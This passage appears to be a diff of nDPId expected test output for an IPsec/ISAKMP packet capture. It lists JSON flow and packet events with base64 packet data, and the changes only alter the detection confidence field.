w4kZ1bGo0YToz8QCnkfhb905KjwaC0BtYJKhTYqKepBpdMk1ABAYnlGAgpGml\/BnBm2gK1KR+5V00l\/SciWQJHFxEldf+2DOoJtw884NKtF1vFW7EhPfWqLyLXCFeo6LZks4jdktwG9EUQtt4BLPuvVyXAU3LtPeLt60tAwN\/SuEqqQh6CheihsGUzntaWNdK9vF\/rZwhofpjFdB6Jch8YOvyjSwYpP+j6pyZmT7Nw0n6FlxB2xOH4XiWJP3RrVBIW46wWavhUPTR1GC0LhX7Jubx5eaacA"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744635161,"flow_last_seen":946744635161,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946744635161,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744635161,"flow_last_seen":946744635161,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946744635161,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946744635283,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946744635283,"pkt":"YDjgxTWgeJS0JASgCABFAADsdK0AAPcRYZht7bvBwKgCZBGUOKQA2OumAAAAALZO8yExpIlShrq9OQSIaVUuICMgAAAAAQAAAMwkAACwawmreKZrDBcIUTKWFfToFDg6qtDsyKKjgBXTNi4vJaEzwbhJuG171IwN4X7FupdGnYt8Co6xmRVm+RkdtKZ0NJmqeR\/qj\/G34eopZIcEsqB7nVGS9NkMVNQcB92DOLKkbkTpEypbftjCf9PGdG4jAg2e7K5fG1yC3G1wHKmrKsTWscrC+5r6aMrQIgOr0unE2oUc0o+Ct9Zb0Dqhj+nQky39U42OTCpKJsuUJg=="} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946744635838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946744635838,"pkt":"eJS0JASgYDjgxTWgCABFAACMRLVAAD8RCfHAqAJkbe27wTikEZQAeEVsAAAAALZO8yExpIlShrq9OQSIaVUuICMIAAAAAgAAAGwwAABQsvg7Xs9r\/Ox3tq4oeDG2fCdsQnjxZd10Tk3TjbPgn+1YkpKifKhrE04HnKNVi6NO3zCXbR\/3wORB+UprbFsUQK+XhsAwdIy8g2ma9g=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744638499,"flow_last_seen":946744638499,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946744638499,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946744638499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946744638499,"pkt":"eJS0JASgYDjgxTWgCABFAAMkRKpAAD8RB2TAqAJkbe27wSkEAfQDEDTUtk7zITGkiVIAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAAzeEi7yBuz4Jc\/1lTuVX20pSg0wd78lahgWmI7UPYwEqg9jMZjDlZCMEiLmQFe0Un1oHlqRMr5bur0YWYOFmXhIDmbpuDdYYTe2FZk4UyxO9yQYqnlxava5Eb30fMpgELAKsnrnWauPFmg\/ND483cWUra4SbFJUPC2aT60GVqXpKQAAJFaYhWAzRgXwwxmmNCLSkHZjhcYvCGnbRY7q28HVKg1gKQAAHAAAQAQLrJ6w\/lRWK0YeWEq0E9E8QsTPBwAAABwAAEAFSiYt1ZZ+5yll6Yhny4WW51p\/IS8="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744638499,"flow_last_seen":946744638499,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946744638499,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744638499,"flow_last_seen":946744638499,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946744638499,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946744638499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946744638499,"pkt":"YDjgxTWgeJS0JASgCABFAABQc3cAAPcRY2pt7bvBwKgCZAH0KQQAPCbetk7zITGkiVIAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVc59hOnD3cUhMt6aqPw=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946744638499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946744638499,"pkt":"eJS0JASgYDjgxTWgCABFAAM8RLJAAD8RB0TAqAJkbe27wSkEAfQDKPqCtk7zITGkiVIAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFVc59hOnD3cUhMt6aqPyIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAAzeEi7yBuz4Jc\/1lTuVX20pSg0wd78lahgWmI7UPYwEqg9jMZjDlZCMEiLmQFe0Un1oHlqRMr5bur0YWYOFmXhIDmbpuDdYYTe2FZk4UyxO9yQYqnlxava5Eb30fMpgELAKsnrnWauPFmg\/ND483cWUra4SbFJUPC2aT60GVqXpKQAAJFaYhWAzRgXwwxmmNCLSkHZjhcYvCGnbRY7q28HVKg1gKQAAHAAAQAQLrJ6w\/lRWK0YeWEq0E9E8QsTPBwAAABwAAEAFSiYt1ZZ+5yll6Yhny4WW51p\/IS8="} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":11884,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":946745300340} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946744635161,"flow_last_seen":946745301909,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":14900,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946744638499,"flow_last_seen":946745300411,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":946744635161,"flow_last_seen":946745725650,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":21828,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946744635161,"flow_last_seen":946745301909,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":14900,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946744638499,"flow_last_seen":946745300411,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":946744635161,"flow_last_seen":946745725650,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":21828,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":62,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":62,"packets-processed":61,"total-skipped-flows":0,"total-l4-payload-len":29572,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":4,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":946747247312} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":946744635161,"flow_last_seen":946747248846,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28756,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":946744635161,"flow_last_seen":946747248846,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28756,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946747261671,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946747261671,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946747261671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946747261671,"pkt":"eJS0JASgYDjgxTWgCABFAAMkuaJAAD8RkmvAqAJkbe27wSkEAfQDEGD5AZBhkeKlmwMAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAKGAsvWV\/zQVhq\/hJoHH8AYniN6FeuyxSfw+6v8+TZ2aV\/eQHTAekhsMir30WM6CEekhg45zfVRaj2FmD+ZfPc1J0g35pRKSQvofRlbM3fuT1WnKIqplL2fu\/HlxFtKVp0xPS4zMaJRLqRwULa\/enCJCqs7IYnzlZiNo5oI9oqCWKQAAJEKv5LxLPIWbWhlAntaMNIE8OrosW7s+IoP+1aOYvC6+KQAAHAAAQATRkAuMyksdt7ZyyotQyUgkqphqOAAAABwAAEAFZ+MQmn3luQjk\/YoBsAfZs8bK1B0="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946747261671,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946747261671,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946747261671,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946747261671,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946747261671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946747261671,"pkt":"YDjgxTWgeJS0JASgCABFAABQldUAAPcRQQxt7bvBwKgCZAH0KQQAPJQuAZBhkeKlmwMAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVeqG9ayGKhGr+lsf4kQ=="} 01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946747261671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946747261671,"pkt":"eJS0JASgYDjgxTWgCABFAAM8uatAAD8RkkrAqAJkbe27wSkEAfQDKBBcAZBhkeKlmwMAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFVeqG9ayGKhGr+lsf4kSIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAKGAsvWV\/zQVhq\/hJoHH8AYniN6FeuyxSfw+6v8+TZ2aV\/eQHTAekhsMir30WM6CEekhg45zfVRaj2FmD+ZfPc1J0g35pRKSQvofRlbM3fuT1WnKIqplL2fu\/HlxFtKVp0xPS4zMaJRLqRwULa\/enCJCqs7IYnzlZiNo5oI9oqCWKQAAJEKv5LxLPIWbWhlAntaMNIE8OrosW7s+IoP+1aOYvC6+KQAAHAAAQATRkAuMyksdt7ZyyotQyUgkqphqOAAAABwAAEAFZ+MQmn3luQjk\/YoBsAfZs8bK1B0="} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":85,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":85,"packets-processed":84,"total-skipped-flows":0,"total-l4-payload-len":40332,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":5,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":946748116878} 